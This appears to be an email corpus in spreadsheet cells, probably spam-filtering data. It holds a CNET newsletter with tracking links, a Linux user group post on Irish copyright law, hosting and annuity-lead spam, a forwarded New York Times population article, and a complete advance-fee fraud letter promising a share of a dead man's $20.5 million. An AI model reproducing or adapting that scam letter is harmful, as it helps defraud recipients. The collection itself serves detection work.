 &amp;#149; &lt;a href="http://clickthru.online.com/Click?q=16-T_cjI4cFDOFy6fgDblRuaBDxRURR"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href="http://clickthru.online.com/Click?q=2c-DatOIc0DRUKa2G5c-r7MBvWpjudR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 2. &lt;a href="http://clickthru.online.com/Click?q=41-qqJ1IEKIeD2-LLQU5CfCkxHB0FrR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 3. &lt;a href="http://clickthru.online.com/Click?q=56-NwKYInnsvJUaBZ2rctPQDwwaMCiR" &gt;Canon PowerShot S30&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 4. &lt;a href="http://clickthru.online.com/Click?q=6b-8g5ZIHEcOAd9O5E80ywQ-4d0P6lR" &gt;Canon PowerShot A40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 5. &lt;a href="http://clickthru.online.com/Click?q=80-KTKvQQ0KYe82T0BoaDkjVsTLZ89R" &gt;Nikon Coolpix 995&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=95-XdwrQvdJfeV4tPKr1yZeU_u_KnuR"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src="http://news.cnet.com/i/ne/bb/2002/07/0717_jobs1.jpg" alt="" width="96" height="72" border="0"&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;img src="http://home.cnet.com/b.gif" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;
                         &lt;b&gt;&lt;font size="+0"&gt;&lt;a href="http://clickthru.online.com/Click?q=aa-gBteQXUr_twy_mRWLXZBXqONOVsR" &gt;Jobs presents iMac's new face&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 In his Macworld 2002 keynote, Apple CEO Steve Jobs shows off a new 17-inch flat-panel iMac.&lt;br&gt;
                         &lt;a href="http://clickthru.online.com/Click?q=bf-JtRfQ8Zrg9pWaKl5w8PF_jEuwtZR" &gt;&lt;img src="http://news.cnet.com/i/gl/vid-w.gif" width=24 height=18 border=0 hspace=3 align=top&gt;&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=d5-p-viQzL1GRb6boGHCu4jNix1DPuR"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href="http://clickthru.online.com/Click?q=ea-fjLyQhV4XVqaQ3-AwQ4lAUw-5WsR" &gt;
 CA replaces four board members &lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=ff-sVoVQms4myFO6trZxrhBm0WHthZR" &gt;
 HP ousts workers for e-mail abuse&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=14-5MRAIF-zGNzjyu98ZvQIzTKtR1dR" &gt;
 Group offers computer security standard&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;E-Business&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=29-Sg_rIjMAh2xne59NyGEI9rCM8vcR" &gt;
 VC-backed companies fusing forces &lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=3e-F51nIizXmEaSxOq_7DQESNPe-iRR" &gt;
 Markets edge up on Intel news&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=53-n86dINn6Z4E0c-sjHpx8lOheMnlR" &gt;
 uBid to charge listing fees to sellers&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr valign="top"&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;Communications&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=68-iM8qIsPPH1ymIAvywvjsK-FdLP4R" &gt;
 Tellabs warns of "murky" sales future &lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=7d-FFEqIDLPzoEyNq9Uywq2NRJSBTeR" &gt;
 Banks seek freeze on WorldCom funds &lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=92-ubRVQTzT5OoTHMOzeFOPq1FsnysR" &gt;
 Motorola's net loss worst ever&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;Media&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=a8-02XZQQZkruZXLBtDtZs6swzdON9R" &gt;
 Net watchdog blasts China Web rules &lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=bd-c0nUQ7py5L5YJw2pAEVgnfqGsJuR" &gt;
 Yahoo strikes listing deal with CityFeet &lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=d2-THo_QULw1K8jArh3Gl22vbAOyesR" &gt;
 Eleven vie for .org name&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
        &lt;/tr&gt;
         &lt;tr valign="top"&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                        &lt;b&gt;Personal Technology&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=e7-2y-GQmVXoNYnRGTVqS8CMB0qvsZR" &gt;
 Apple to charge for iTools services &lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=fc-WpHmQVwFSZrUaAca9-0t3VVat9dR" &gt;
 Apple meets lowered expectations &lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=11-l8riI2-4EmnhB-3X3VynhNBuCqcR" &gt;
 Moxi moves into cable boxes &lt;/a&gt;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href="http://clickthru.online.com/Click?q=26-KqPVIiMHordUwJeBBBkqU8niQ7RR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;p&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-cnet-newsletters@example.com&lt;br&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=3b-XhvVzBdMK7EMLEy9PuRg8AlPc1GyzdRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@example.com&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=51-QgUWIjJPxza2HKGJlh9GpMUHM3rR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=66-kDH_IyWIA9toGOgsPj9y-DzbW-iR"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href="http://clickthru.online.com/Click?q=7b-prT_IBZIw9xyoULbDr4q1O7VpJlR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=90-wHZMQ_IdqUbO6rpVb8HYULuonX9R" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=a5-DyaHQ7ZTaQWhQKxsIC1b2OB8OEuR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=ba-m-45QXpKAfA-XYwxhOmI_uIUEksR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=cf-ebM-QLw2HMvKMU_JaylIO7r3fxZR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=e4-ABYFQVkWG2H7v1II81u0PT_Qv1dR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e433&amp;ISSUE=2002-07-17" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=fa-FmbN-XO3bOfEZ59F5G-GmYUJfRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Next of kin needed?
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir,
 My name is Mr. Obi W, the manager, credit and foreign bills of Eco
 Bank Plc. I am writing in respect of a foreign customer of my bank
 with account number 14-255-2004/utb/t who perished in a plane crash
 [Korean Air Flight 801] with the whole passengers aboard on August 6,
 1997.
 Since the demise of this our customer, I personally has watched
 with keen interest to see the next of kin but all has proved abortive
 as no one has come to claim his funds of usd.20.5 m, [twenty million
 five hundred thousand united states dollars] which has been with my
 branch for a very long time. On this note, I decided to seek for whom
 his name shall be used as the
 next of kin as no one has come up to be the next of kin. And the
 banking ethics here does not
 allow such money to stay more than five years, because money will be
 recalled to the bank treasury as unclaimed after this period. In view
 of this I got your contact through a trade journal after realizing
 that your name and country is similar to the deceased. I will give
 you 25% of the total.
 Upon the receipt of your response, I will send you by fax or e-mail
 the application, bank's fax number and the next step to take. I will
 not fail to bring to your notice that this business is hitch free and
 that you should not entertain any fear as all modalities for fund
 transfer can be finalized within five banking days, after you apply
 to the bank as a relation to the deceased.
 When you receive this letter. Kindly send me an e-mail signifying
 Your decision including your private Tel/Fax numbers for quick
 communication.
 Respectfully submitted,
 Obi   W.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Irish Copyright Law: some analyses
</t>
  </si>
  <si>
    <t xml:space="preserve">Two interesting analyses of the Irish implementation of copyright as led by, as
 best I can tell, anticipation of the EUCD (since the Irish law was passed in
 2000, and the EUCD is somewhat more recent than that). The pieces of interest
 are the papers by Prof. Robert Clark, who perhaps might not be a bad choice of
 speaker for some future LUG gathering. One of the more eye-opening comments in
 the second of his papers is that Irish legislation is, in effect, more
 draconian than the DMCA.
 http://www.cai.ie/Past%20Events.html#2002
 There are some other interesting pieces here, too, for anyone concerned about
 copyright and the like in Ireland.
 Cheers,
 Waider. Props to Danny at NTK (www.ntk.net) for the link.
 -- 
 waider@waider.ie / Yes, it /is/ very personal of me.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Ground breaking post card creates annuity leads
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_5B81AF_01C20D87.4EEF5910
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  Generate your own leads using ground-breaking Roth conversion
 postcards.	
   _____  
 Every senior wants to hear about the roth conversion if you can
 eliminate the up front tax cost. You can with the new and improved roth
 conversion program from GSL Advisory. 
 The cheapest and most successful way to generate roth conversion program
 leads is to send postcards while also placing an ad in the small local
 paper. Repeat the ads and the postcard mailing at least 6 different
 times.
 The one truth in advertising is that repetition works. Even the smallest
 and most unassuming ad works if it is seen several times. See if you can
 find an area that has its own zip code and a local paper serving that
 area. Some retirement communities have both a newspaper and their own
 zip code.
 This is your gold mine.
 To see the postcard and ad and to learn how to work the system, complete
 the form below which will direct you to the post card and how to make it
 work for you.
 First Name:	  	 	
 Last Name:	  	Note that when you press the "Send Information"
 button the screen may not change, but we will still receive your
 information and get back to you. Another way to order our sample
 presentation is to visit our website at www.gsladvisory.com/froco
 &lt;http://www.gsladvisory.com/froco&gt; .	 
 E-Mail:	  	
 Phone#:	  	
 These materials are for "agent use only." You should be a practicing,
 licensed and appointed annuity agent.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------=_NextPart_000_5B81AF_01C20D87.4EEF5910
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Ground breaking post card creates annuity leads&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;!-- FROM: GSL --&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;table width=3D"550" cellpadding=3D"0" cellspacing=3D"0" =
 align=3D"center" bgcolor=3D"#FFFFFF"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;=20
       &lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"2" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;img =
 src=3D"http://iiq.us/images/gsl/postcard/20020504-101.gif" width=3D"550" =
 height=3D"78" alt=3D"Generate your own leads using ground-breaking Roth =
 conversion postcards."&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;img =
 src=3D"http://iiq.us/images/gsl/postcard/20020504-102.gif" width=3D"550" =
 height=3D"393"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;=20
             &lt;hr width=3D"90%" size=3D"1" color=3D"#000000"&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;
             &lt;font face=3D"Georgia, Times New Roman, Times, serif" =
 size=3D"2" color=3D"#000066"&gt;=20
             &lt;p&gt;&lt;b&gt;Every senior wants to hear&lt;/b&gt; about the roth =
 conversion if=20
               you can eliminate the up front tax cost. &lt;b&gt;You can with =
 the new=20
               and improved roth conversion program from GSL =
 Advisory.&lt;/b&gt; &lt;/p&gt;
             &lt;p&gt;The cheapest and most successful way to generate roth =
 conversion=20
               program leads is to send postcards while also placing an =
 ad in the=20
               small local paper. Repeat the ads and the postcard mailing =
 at least=20
               6 different times.&lt;/p&gt;
             &lt;p&gt;The one truth in advertising is that&lt;b&gt; repetition =
 works&lt;/b&gt;. Even=20
               the smallest and most unassuming ad works if it is seen =
 several=20
               times. See if you can find an area that has its own zip =
 code and=20
               a local paper serving that area. Some retirement =
 communities have=20
               both a newspaper and their own zip code.&lt;/p&gt;
             &lt;p align=3D"center"&gt;&lt;font size=3D"4"&gt;&lt;b&gt;This is your gold =
 mine.&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
             &lt;p&gt;To see the postcard and ad and to learn how to work the =
 system,=20
               complete the form below which will direct you to the post =
 card and=20
               how to make it work for you.&lt;br&gt;
               &amp;nbsp;&lt;/p&gt;
             &lt;/font&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt; =
             &lt;table border=3D1 cellpadding=3D2 width=3D100% =
 bordercolor=3D"#000000" cellspacing=3D"0"&gt;
               &lt;form =
 action=3D"http://www.gsladvisory.com/froco_data/gsl_page.cfm" =
 method=3Dpost&gt;
                 &lt;input name=3DxSubject type=3Dhidden =
 value=3D"InsuranceIQ Email Request"&gt;
                 &lt;tr bgcolor=3D#ffcc33&gt;=20
                   &lt;td width=3D20%&gt;&lt;b&gt;&lt;font color=3D#000000 =
 size=3D2&gt;First Name:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                   &lt;td width=3D30%&gt;=20
                     &lt;input name=3Dfirstname&gt;
                   &lt;/td&gt;
                   &lt;td width=3D50%&gt;=20
                     &lt;input name=3DSubmit type=3Dsubmit value=3D"Send =
 Information"&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr bgcolor=3D#ffcc33&gt;=20
                   &lt;td width=3D20%&gt;&lt;b&gt;&lt;font color=3D"#000000" =
 size=3D"2"&gt;Last Name:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                   &lt;td width=3D30%&gt;=20
                     &lt;input name=3Dlastname&gt;
                   &lt;/td&gt;
                   &lt;td rowspan=3D3 width=3D50%&gt;&lt;font color=3D#000000 =
 size=3D1&gt;Note that=20
                     when you press the &amp;quot;Send Information&amp;quot; =
 button the=20
                     screen may not change, but we will still receive =
 your information=20
                     and get back to you. Another way to order our sample =
 presentation=20
                     is to visit our website at &lt;a =
 href=3D"http://www.gsladvisory.com/froco"&gt;www.gsladvisory.com/froco&lt;/a&gt;.&lt;=
 /font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr bgcolor=3D#ffcc33&gt;=20
                   &lt;td width=3D20%&gt;&lt;b&gt;&lt;font color=3D#000000 =
 size=3D2&gt;E-Mail:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                   &lt;td width=3D30%&gt;=20
                     &lt;input name=3DEmail&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr bgcolor=3D#ffcc33&gt;=20
                   &lt;td width=3D20%&gt;&lt;b&gt;&lt;font color=3D#000000 =
 size=3D2&gt;Phone#:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                   &lt;td width=3D30%&gt;=20
                     &lt;input name=3D"Phone"&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
               &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
             &lt;/table&gt;
             &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td align=3D"center"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/gsl7/gsl_big.gif" width=3D"256" =
 height=3D"69"&gt;&lt;br&gt;
             &lt;font size=3D"1" face=3D"Arial, Helvetica, sans-serif"&gt;&lt;br&gt;
             These materials are for &amp;quot;agent use only.&amp;quot; You =
 should be=20
             a practicing, licensed and appointed annuity =
 agent.&lt;/font&gt;&lt;/td&gt;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&lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_5B81AF_01C20D87.4EEF5910--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hosting from ?6.50 per month
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_0037_01C24D21.FF37C620
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 VC Computers Ltd - Ireland
 HOSTING from an Irish company from as little as ?6.50 per month.
 Yes its true, we can offer your business hosting from only ?78.00 per =
 year.=20
 With local support and service, and without the time difference you find =
 with many companies based in the US, you are sure to get a swift =
 response to any queries or questions you have.
 Standard Hosting Pack includes=20
 10 e-mail addresses
 50MB space
 500Mb transfer per month
 PHP4
 JSP
 CGI
 We can also offer other enhanced services for your hosting requirements, =
 including databases, SSL, shopping cart systems etc..
 Contact hosting@vccomputers.ie for more information or visit our site at =
 http://www.vccomputers.ie=20
 All prices exclude applicable taxes. E&amp;OE.
 We respect your privacy and we are only sending you this mail to inform =
 you of the products and services we can offer your business.
 If you would prefer not to receive these mails in the future, simply =
 send us a reply at nomoremail@vccomputers.ie stating this fact and we =
 will remove you from our list straight away. We would also appologise =
 for any inconvenience this mail may have caused you.
 ------=_NextPart_000_0037_01C24D21.FF37C620
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;META content=3D"MSHTML 6.00.2600.0" name=3DGENERATOR&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=3D#ffffff&gt;
 &lt;DIV align=3Djustify&gt;&lt;FONT face=3DArial color=3D#0000ff =
 size=3D5&gt;&lt;STRONG&gt;VC Computers=20
 Ltd - Ireland&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV align=3Djustify&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV align=3Djustify&gt;&lt;FONT face=3DArial color=3D#0000ff&gt;HOSTING from an =
 Irish company=20
 from as little as =806.50 per month.&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV align=3Djustify&gt;&lt;FONT face=3DArial =
 color=3D#0000ff&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV align=3Djustify&gt;&lt;FONT face=3DArial color=3D#0000ff&gt;Yes&amp;nbsp;its =
 true, we can=20
 offer your business hosting from only =8078.00 per year. &lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV align=3Djustify&gt;&lt;FONT face=3DArial color=3D#0000ff&gt;With local =
 support and=20
 service, and without the time difference&amp;nbsp;you find with =
 many&amp;nbsp;companies=20
 based in the US, you are sure to get a swift response to any queries or=20
 questions you have.&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV align=3Djustify&gt;&lt;FONT face=3DArial =
 color=3D#0000ff&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV align=3Dcenter&gt;&lt;FONT color=3D#008000 size=3D4&gt;Standard Hosting Pack =
 includes&amp;nbsp;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV align=3Dcenter&gt;&lt;FONT color=3D#008000 size=3D4&gt;10 e-mail =
 addresses&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV align=3Dcenter&gt;&lt;FONT color=3D#008000 size=3D4&gt;50MB =
 space&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV align=3Dcenter&gt;&lt;FONT color=3D#008000 size=3D4&gt;500Mb transfer per=20
 month&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV align=3Dcenter&gt;&lt;FONT color=3D#008000 size=3D4&gt;PHP4&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV align=3Dcenter&gt;&lt;FONT color=3D#008000 size=3D4&gt;JSP&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV align=3Dcenter&gt;&lt;FONT color=3D#008000 size=3D4&gt;CGI&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV align=3Djustify&gt;&lt;FONT face=3DArial =
 color=3D#0000ff&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV align=3Djustify&gt;&lt;FONT face=3DArial color=3D#0000ff&gt;We can also =
 offer other=20
 enhanced services for your hosting requirements, including databases,=20
 SSL,&amp;nbsp;shopping cart systems&lt;/FONT&gt;&lt;FONT face=3DArial=20
 color=3D#0000ff&gt;&amp;nbsp;etc..&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV align=3Djustify&gt;&lt;FONT face=3DArial =
 color=3D#0000ff&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV align=3Djustify&gt;&lt;FONT face=3DArial&gt;&lt;FONT =
 color=3D#0000ff&gt;Contact&lt;/FONT&gt;&lt;FONT=20
 color=3D#ff0000&gt; &lt;/FONT&gt;&lt;A href=3D"mailto:hosting@vccomputers.ie"&gt;&lt;FONT=20
 color=3D#ff0000&gt;hosting@vccomputers.ie&lt;/FONT&gt;&lt;/A&gt;&lt;FONT color=3D#0000ff&gt; =
 for more=20
 information or visit our site at &lt;A =
 href=3D"http://www.vccomputers.ie"&gt;&lt;FONT=20
 color=3D#ff0000&gt;http://www.vccomputers.ie&lt;/FONT&gt;&lt;/A&gt; =
 &lt;/FONT&gt;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV align=3Djustify&gt;&lt;FONT face=3DArial color=3D#0000ff =
 size=3D3&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV align=3Djustify&gt;&lt;FONT face=3DArial color=3D#0000ff size=3D1&gt;All =
 prices exclude=20
 applicable taxes. E&amp;amp;OE.&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV align=3Djustify&gt;&lt;FONT face=3DArial size=3D1&gt;We respect your privacy =
 and we are=20
 only sending you this mail to inform you of the products and services we =
 can=20
 offer your business.&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV align=3Djustify&gt;&lt;FONT face=3DArial&gt;&lt;FONT size=3D1&gt;If you would =
 prefer not to=20
 receive these mails in the future, simply send us a reply at &lt;/FONT&gt;&lt;A=20
 href=3D"mailto:nomoremail@vccomputers.ie"&gt;&lt;FONT face=3D"Times New Roman" =
 color=3D#ff0000 size=3D1&gt;nomoremail@vccomputers.ie&lt;/FONT&gt;&lt;/A&gt;&lt;FONT=20
 size=3D1&gt;&amp;nbsp;stating this fact and we will remove you from our list =
 straight=20
 away. We would also appologise for any inconvenience this mail may have =
 caused=20
 you.&lt;/FONT&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 ------=_NextPart_000_0037_01C24D21.FF37C620--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Experts Scale Back Estimates of World Population Growth
</t>
  </si>
  <si>
    <t xml:space="preserve">The demographic transition, where birthrates are lowered by increased life
 expectancy, seems to be happening faster than the experts have anticipated.
 I attribute this apparently precipitous decline in "sustainable"
 development to the twin evils of increasing personal freedom and economic
 globalization.
 Somebody oughta pass a law to prevent those things, of course, before it's
 too late. The People's way of life *must* be preserved in its natural,
 pre-industrial state, or we'll lose it forever.
 ;-).
 Cheers,
 RAH
 http://www.nytimes.com/2002/08/20/science/earth/20POPU.html?pagewanted=print&amp;position=top
 The New York Times
 August 20, 2002
 Experts Scale Back Estimates of World Population Growth
 By BARBARA CROSSETTE
 Demography has never been an exact science. Ever since social thinkers
 began trying to predict the pace of population growth a century or two ago,
 the people being counted have been surprising the experts and confounding
 projections. Today, it is happening again as stunned demographers watch
 birthrates plunge in ways they never expected.
 Only a few years ago, some experts argued that economic development and
 education for women were necessary precursors for declines in population
 growth. Today, village women and slum families in some of the poorest
 countries are beginning to prove them wrong, as fertility rates drop faster
 than predicted toward the replacement level - 2.1 children for the average
 mother, one baby to replace each parent, plus a fraction to compensate for
 unexpected deaths in the overall population.
 A few decades ago in certain countries like Brazil, Egypt, India and Mexico
 fertility rates were as high as five or six.
 As a result, United Nations demographers who once predicted the earth's
 population would peak at 12 billion over the next century or two are
 scaling back their estimates. Instead, they cautiously predict, the world's
 population will peak at 10 billion before 2200, when it may begin declining.
 Some experts are wary of too much optimism, however. At the Population
 Council, an independent research organization in New York, Dr. John
 Bongaarts has studied population declines in various countries over the
 last half century. He questions the assumption that when fertility declines
 begin they will continue to go down at the same pace, especially if good
 family planning services are not widely available.
 Sharp fertility declines in many industrialized and middle-income countries
 had already challenged another old belief: that culture and religion would
 thwart efforts to cut fertility. In Italy, a Roman Catholic country whose
 big families were the stuff of cinema, family size is shrinking faster than
 anywhere else in Europe, and the population is aging rapidly as fewer
 children are born. Islamic Iran has also had great success with family
 planning.
 "Projections aren't terribly accurate over the long haul," said Dr.
 Nicholas Eberstadt, a demography expert at the American Enterprise
 Institute in Washington. "Demographers have been surprised by just about
 every big fertility change in the modern period. Demographers didn't
 anticipate the baby boom. They did not anticipate the subsequent decline in
 fertility in industrialized Western democracies."
 What's next? Demographers can agree generally on a few measurable facts and
 some trends. The world's population, now 6.2 billion, quadrupled in the
 20th century, and changed in drastic ways. In 1900, 86 percent of the
 world's people lived in rural areas and about 14 percent in urban areas. By
 2000, urban communities were home to 47 percent of the population, with 53
 percent still in the countryside.
 Between now and 2030, when the global population is expected to reach about
 eight billion, almost all the growth will be in cities. But urbanization is
 not necessarily a bad thing for the environment, said Dr. Joseph Chamie,
 director of the United Nations' population division.
 "Moving to cities frees up the land for forestry, agriculture and many
 other activities," Dr. Chamie said. "You're getting people concentrated, so
 you can probably recycle more easily. People change their lifestyles. The
 Indian moving from the boonies of Uttar Pradesh to the city of Lucknow gets
 educational opportunities, cultural opportunities, all sorts of political
 participation. He can be influenced by advertising and public relations
 campaigns. Immunization will be better, and family planning."
 As births fall and lives are extended, the global population is getting
